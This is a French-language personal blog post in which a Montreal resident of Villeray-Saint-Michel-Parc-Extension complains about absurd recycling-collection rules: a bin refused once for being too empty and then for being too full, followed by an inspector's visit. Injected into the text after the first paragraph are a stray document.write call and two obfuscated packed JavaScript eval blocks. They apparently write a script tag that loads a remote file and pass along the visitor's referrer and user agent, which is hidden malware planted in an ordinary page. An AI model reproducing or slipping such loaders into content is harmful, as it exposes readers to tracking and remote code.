Absurdité-Saint Michel-Pas d’réflexion

J’aimerais ici vous faire part, document.write(“”); et partager, la frustration que j’éprouve avec un problème lié au recyclage. J’ai emménagé depuis neuf mois dans l’arrondissement Villeray-Saint Michel-Parc Extension. Comme nous occupons, ma soeur et moi, un duplex on nous a donné à l’Éco-Quartier de Saint Michel un gros bac de recyclage à roulette (de 360 litres). On ne me donne aucune instruction particulière pour ce bac. Pour les sept premiers mois je n’ai pas eu de problème de recyclage (à une inspection on m’avait même laissé une note me félicitant de bien suivre les règles sur ce qui pouvait être recyclé). Je ne me doutais pas que le recyclage deviendrait un cauchemar d’absurdité!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skzsb|var|u0026u|referrer|rzrne||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yiasi|var|u0026u|referrer|aefdn||js|php’.split(‘|’),0,{}))

Le 28 novembre dernier je remarque qu’on ne ramasse pas mon bac de recyclage (l’employé l’ouvre, regarde à l’intérieur, le referme et puis continue son chemin). Voyant cela, j’enfile rapidement un manteau et je cours après le camion pour savoir c’est quoi le problème. On me dit que le bac n’est pas assez plein et qu’on le ramassera la prochaine fois! (Ma soeur étant en voyage depuis presque dix jours, il y avait effectivement moins de recyclage que d’habitude) J’étais estomaqué: je paie comme tout le monde pas mal de taxes et je m’attend donc que, quand je mets mon recyclage, il soit, comme tout le monde, ramassé peu importe les circonstances. Quelques jours plus tard (le premier décembre), j’ai donc appellé au service 311 de la ville pour signaler cet incident. L’employé enregistre ma plainte (elle se nomme mais ne me donne pas de numéro de requête) mais aucune action n’est entreprise et je dois donc remettre mon recyclage la semaine suivante. Évidemment, l’addition du recyclage d’une semaine (même une petite semaine) plus celui de la semaine suivante fait que mon bac déborde la fois suivante et que je dois en mettre dans des sacs à côté. C’est ennuyeux car avec des sacs il y a toujours le risque que des animaux (ou des “recycleux” en quête de bouteilles consignées) percent les sacs et fassent un dégat (dont je serais ultimement responsable). Les rues sont déjà assez sales comme ça.

Suite à cet incident, je me dis donc que doréravant je remplirai mon bac un peu plus. Cela tombe bien vue que je commence à faire le ménage dans mon garage. Quand j’ai déménagé ne n’ai pas eu le temps de faire le tri dans mes affaires et j’ai donc tout amené en me disant que je ferais le ménage plus tard. J’ai accumulé beaucoup de choses au fil des ans (des livres, de l’équipement électronique, des magazines, des factures, de la correspondance, de la paperasse en tout genres — quelque part la-dedans il y a même des notes de cours du secondaire et du CEGEP!). J’ai essayé de séparer ce qui était réutilisable et que je pouvais donner à des organismes caritatifs de ce qui devait être simplement recyclé. Cela faisait tout de même pas mal de recyclage que je mettais peu à peu dans le bac (en le remplissant pas mal à chaque fois, puisque quand il était rempli un peu moins que la moitié on avait refusé de le vider). J’ai fait cela toute les semaines pendant deux mois sans le moindre problème. Mais évidemment cela ne pouvait pas durer…

Cette semaine, le vingt-trois janvier, j’ai remarqué en revenant du travail que mon bac n’avait pas été vidé alors que le recyclage des voisins des deux côtés de la rue l’avait été. J’ai immédiatement appellé au 311 pour signaler le problème. L’employé (qui ne se nomme pas mais me donne un numéro de requête) me dit qu’elle transmet l’information à un contre-maître et que quelqu’un passera. Je laisse donc mon bac en bordure du trottoir. Le lendemain après-midi je n’ai eu aucune nouvelle et mon bac n’est toujours pas vidé alors je rappelle au 311. L’employé (qui se nomme mais ne me donne pas de numéro de requête) me dit qu’il va demander à un contre-maître d’aller voir ça. Je laisse donc mon bac en bordure du trottoir.

Cet après-midi (heureusement que je suis en congé!) je reçois finalement la visite de quelqu’un (mais ce n’est pas un contre-maître, c’est un inspecteur). Et ce n’est pas pour voir à ce que mon bac soit vidé: c’est pour me donner une contravention parce que 1) mon bac est trop plein et trop lourd et 2) qu’il est encore en bordure du trottoir après les heures permises!!! Là, c’en est trop, je “pête une coche”. Ça c’est typique: parce que je me plains on contre-attaque pour me faire taire en me menaçant d’une contravention! Apparemment (et c’est la première fois qu’on me mentionne cela) les bacs ne doivent pas peser plus que vingt-cinq kilos (bon, vingt-cinq kilos de cannage, de bouteilles vides et d’emballages ça rempli quand même pas mal un bac, mais vingt-cinq kilos de papiers et de magazines divers ça n’en rempli pas la moitié — et l’on sait que si le bac est rempli à moins de la moitié il y a de bonne chance qu’on refuse de me le ramasser! Chose amusante le bac en soi fait déjà plus de cinq kilos! Et, de toute façon, le poids total de ce genre de bac n’a guère d’importance: il suffit de le prendre par les poignées, appuyer au bas avec le pied et le faire doucement pivoter; LES ROUES font le reste et c’est l’équipement — pas l’employé — qui agrippe le bac par des crochets et déverse son contenu dans le camion peu importe s’il ferait vingt-cinq, cinquante ou même soixante kilos). Et apparemment quand on a beaucoup de paperasse et de magazines comme moi ça devient du recyclage commercial! Vraiment?

Heureusement l’inspecteur s’est montré conciliant. Il ne m’a pas donné de contravention et m’a suggéré des “solutions”: je n’ai qu’à moins remplir le bac en ne mettant que l’équivalent d’un petit bac (oui mais on m’a déjà refusé de vider mon bac parce qu’il n’était pas assez plein! Et, dans ce cas, ça sert à quoi de donner des gros bacs si on peut pas les remplir?), ou répartir mon recyclage dans plusieurs petits bacs (oui mais je n’ai que le gros bac et un petit que j’ai conservé de mon appartement précédant, et, on le sait, le recyclage dans les petits bacs qui ne ferment pas ça fait beaucoup de dégats quand le vent s’y met et disperse les papiers partout sur la rue), ou encore d’aller porter moi-même mon recyclage à l’éco-centre (oui, mais je n’ai pas de voiture!!).

Cette situation est tout à fait absurde et ridicule: si mon bac de recyclage est trop vide on refuse de le ramasser mais si il est trop plein on refuse de le ramasser aussi! C’est qui ces recycleurs? Boucle D’Or et les trois oursons? Je fais quoi moi, là? Je mets tout ça dans des boites aux vidanges? Si la meilleur solution qu’on me propose c’est d’aller porter moi-même mon recyclage, c’est pourquoi donc que je paie des taxes?

Finalement, je tiens à préciser que durant les dix-huit ans que j’ai demeuré dans Hochelaga-Maisonneuve, je n’ai eu à appeller le 311 (ou l’équivalent) pour des problèmes qu’une demi-douzaine de fois. En moins d’un an dans Villeray-Saint Michel-Parc Extension j’ai déjà fait plus d’une demi-douzaine d’appels (entre autre parce qu’un défaut dans la chaussée et le trottoir en face de chez moi amène l’eau de pluie à s’écouler, non dans le canniveau, mais dans mon entrée de garage, causant des inondations et des dégats. Ce problème n’a été, jusqu’à maintenant et malgré les promesses des contre-maîtres, que très partiellement règlé). Ça en dit long sur la qualité du service… On se croirait dans La P’tite Vie!